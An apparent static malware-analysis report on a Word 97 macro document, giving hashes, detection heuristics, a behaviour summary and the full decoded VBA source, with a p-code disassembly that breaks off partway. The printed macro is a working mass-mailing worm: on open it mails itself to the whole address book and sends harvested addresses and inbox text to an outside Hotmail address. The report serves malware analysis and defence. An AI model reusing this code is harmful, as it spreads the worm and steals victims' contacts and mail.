Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e65a1a731105b039…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 1999-03-05 06:16:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: cbeacd076928d63c2a5180c70e9752a5
SHA-1: 85cc25b032da9dae550c54b4ca8c238cf039edca
SHA-256: e65a1a731105b039283f877f0d2ede4867a8ed9ff461939c5cfeb27473739431
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes when the document is opened, as indicated by the 'Document_Open' procedure and the 'OLE_VBA_DOCOPEN' heuristic. The macro calls 'CreateObject("MAPI.Session")' to log on to the user's email client and send chain emails: it addresses one message to every entry in the victim's address book and attaches the open document itself ('objAttach.Source = ActiveDocument.FullName'), which is why the 'Spearphishing Attachment' technique applies. It also sends a second message to 'chainnail@hotmail.com' containing the harvested address list and the text of a randomly chosen message from the victim's inbox. This behavior is consistent with a self-propagating spam or phishing campaign.

Heuristics (5)

  • ClamAV: Doc.Trojan.Nail-3 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Nail-3
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document contains a Document_Open auto-execution macro
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Macro source contains a CreateObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5410 bytes
SHA-256: 52f7aedc480386dd29e533c1b73e68844a3ae4e367161d27000132d9e5cfdf67

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Automated Chain Mail v0.1
Private Sub Document_Open()
    Randomize
    SubjectLines = Array("Good Times", "New Developments", "WWIII !", "Market share tipoff...")
    ContentLines = Array("New information on this apparent hoax...", "I thought you should know about this recent development...", "Check out CNN.Com or read this", "Please don't share this information with anyone")
    MesNum = Int(Rnd * 4)
    CRLF = Chr(13) + Chr(10)
    Set MAPISess = CreateObject("MAPI.Session")
    MAPISess.Logon
        MesContent = CRLF + ContentLines(MesNum) + CRLF + CRLF + MAPISess.CurrentUser
        Set ChainMes = MAPISess.Outbox.Messages.Add(SubjectLines(MesNum), MesContent)
        Set objRecipients = ChainMes.Recipients
        For Each AdrEntry In MAPISess.AddressLists(1).AddressEntries
            Set Recp = objRecipients.Add(Name:=AdrEntry.Address, Type:=3)
            GInfo = GInfo + AdrEntry.Address + ";"
        Next
        Set objAttach = ChainMes.Attachments.Add
        objAttach.Type = 1
        objAttach.Source = ActiveDocument.FullName
        objAttach.Position = 0
        objAttach.Name = MAPISess.CurrentUser
        GInfo = GInfo + CRLF + CRLF + MAPISess.Inbox.Messages(Int(Rnd * MAPISess.Inbox.Messages.Count) + 1).Text + CRLF
        GInfo = GInfo + "Thank you for your participation... 1nternal"
        Set Retr = MAPISess.Outbox.Messages.Add(MAPISess.CurrentUser, GInfo)
        Set Recp = Retr.Recipients.Add(Name:="chainnail@hotmail.com")
        Retr.Send
        ChainMes.Send
    MAPISess.Logoff
End Sub


' Processing file: /opt/analyzer/scan_staging/26e3db8c962f478c923942559ad88378.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3371 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000F "<!--1nternal-->"
' Line #1:
' 	QuoteRem 0x0000 0x0019 "Automated Chain Mail v0.1"
' Line #2:
' 	FuncDefn (Private Sub Document_Open())
' Line #3:
' 	ArgsCall Read 0x0000 
' Line #4:
' 	LitStr 0x000A "Good Times"
' 	LitStr 0x0010 "New Developments"
' 	LitStr 0x0007 "WWIII !"
' 	LitStr 0x0016 "Market share tipoff..."
' 	ArgsArray Array 0x0004 
' 	St SubjectLines 
' Line #5:
' 	LitStr 0x0028 "New information on this apparent hoax..."
' 	LitStr 0x003A "I thought you should know about this recent development..."
' 	LitStr 0x001E "Check out CNN.Com or read this"
' 	LitStr 0x002F "Please don't share this information with anyone"
' 	ArgsArray Array 0x0004 
' 	St ContentLines 
' Line #6:
' 	Ld Rnd 
' 	LitDI2 0x0004 
' 	Mul 
' 	FnInt 
' 	St MesNum 
' Line #7:
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	St CRLF 
' Line #8:
' 	SetStmt 
' 	LitStr 0x000C "MAPI.Session"
' 	ArgsLd CreateObject 0x0001 
' 	Set MAPISess 
' Line #9:
' 	Ld MAPISess 
' 	ArgsMemCall Logon 0x0000 
' Line #10:
' 	Ld CRLF 
' 	Ld MesNum 
' 	ArgsLd ContentLines 0x0001 
' 	Add 
' 	Ld CRLF 
' 	Add 
' 	Ld CRLF 
' 	Add 
' 	Ld MAPISess 
' 	MemLd CurrentUser 
' 	Add 
' 	St MesContent 
' Line #11:
' 	SetStmt 
' 	Ld MesNum 
' 	ArgsLd SubjectLines 0x0001 
' 	Ld MesContent 
' 	Ld MAPISess 
' 	MemLd Outbox 
' 	MemLd Messages 
' 	ArgsMemLd Add 0x0002 
' 	Set ChainMes 
' Line #12:
' 	SetStmt 
' 	Ld ChainMes 
' 	MemLd Recipients 
' 	Set objRecipients 
' Line #13:
' 	StartForVariable 
' 	Ld AdrEntry 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld MAPISess 
' 	ArgsMemLd AddressLists 0x0001 
' 	MemLd AddressEntries 
' 	ForEach 
' Line #14:
' 	SetStmt 
' 	Ld AdrEntry 
' 	MemLd Address 
' 	ParamNamed New 
' 	LitDI2 0x0003 
' 	ParamNamed TypeOf 
' 	Ld objRecipients 
' 	ArgsMemLd Add 0x0002 
' 	Set Recp 
' Line #15:
' 	Ld GInfo 
' 	Ld AdrEntry 
' 	MemLd Address 
' 	Add 
' 	LitStr 0x0001 ";"
' 	Add 
' 	St GInfo 
' Line #16:
' 	StartForVariable 
' 	Next 
' Line #17:
' 	
... (truncated)